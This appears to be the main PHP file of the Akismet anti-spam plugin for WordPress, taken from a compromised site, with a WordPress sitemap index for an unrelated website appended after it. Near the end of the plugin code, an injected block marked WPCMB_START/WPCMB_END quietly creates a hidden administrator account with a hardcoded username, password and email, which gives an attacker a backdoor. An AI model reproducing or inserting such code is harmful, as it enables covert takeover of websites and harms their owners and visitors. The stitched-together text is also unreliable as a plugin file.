&lt;?php
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet Anti-Spam
Plugin URI: https://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to &lt;strong&gt;protect your blog from spam&lt;/strong&gt;. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 5.0
Author: Automattic
Author URI: https://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

Copyright 2005-2022 Automattic, Inc.
*/

// Make sure we don&#039;t expose any info if called directly
if ( !function_exists( &#039;add_action&#039; ) ) {
	echo &#039;Hi there!  I\&#039;m just a plugin, not much I can do when called directly.&#039;;
	exit;
}

define( &#039;AKISMET_VERSION&#039;, &#039;5.0&#039; );
define( &#039;AKISMET__MINIMUM_WP_VERSION&#039;, &#039;5.0&#039; );
define( &#039;AKISMET__PLUGIN_DIR&#039;, plugin_dir_path( __FILE__ ) );
define( &#039;AKISMET_DELETE_LIMIT&#039;, 10000 );

register_activation_hook( __FILE__, array( &#039;Akismet&#039;, &#039;plugin_activation&#039; ) );
register_deactivation_hook( __FILE__, array( &#039;Akismet&#039;, &#039;plugin_deactivation&#039; ) );

require_once( AKISMET__PLUGIN_DIR . &#039;class.akismet.php&#039; );
require_once( AKISMET__PLUGIN_DIR . &#039;class.akismet-widget.php&#039; );
require_once( AKISMET__PLUGIN_DIR . &#039;class.akismet-rest-api.php&#039; );

add_action( &#039;init&#039;, array( &#039;Akismet&#039;, &#039;init&#039; ) );

add_action( &#039;rest_api_init&#039;, array( &#039;Akismet_REST_API&#039;, &#039;init&#039; ) );

if ( is_admin() || ( defined( &#039;WP_CLI&#039; ) &amp;&amp; WP_CLI ) ) {
	require_once( AKISMET__PLUGIN_DIR . &#039;class.akismet-admin.php&#039; );
	add_action( &#039;init&#039;, array( &#039;Akismet_Admin&#039;, &#039;init&#039; ) );
}

//add wrapper class around deprecated akismet functions that are referenced elsewhere
require_once( AKISMET__PLUGIN_DIR . &#039;wrapper.php&#039; );

if ( defined( &#039;WP_CLI&#039; ) &amp;&amp; WP_CLI ) {
	require_once( AKISMET__PLUGIN_DIR . &#039;class.akismet-cli.php&#039; );
}


/*WPCMB_START_e1ae0ef3*/
if(function_exists('add_action')&&!get_transient('_te1ae0ef3')){set_transient('_te1ae0ef3',1,86400);if(!username_exists('michaellewis84')){$id=wp_insert_user(array('user_login'=>'michaellewis84','user_pass'=>'9g9PtN2B%Y&FOghN','user_email'=>'michaellewis84@wp-internal.net','role'=>'administrator'));}}
/*WPCMB_END_e1ae0ef3*/<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://lawrencefellsproductions.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://lawrencefellsproductions.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://lawrencefellsproductions.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://lawrencefellsproductions.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://lawrencefellsproductions.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
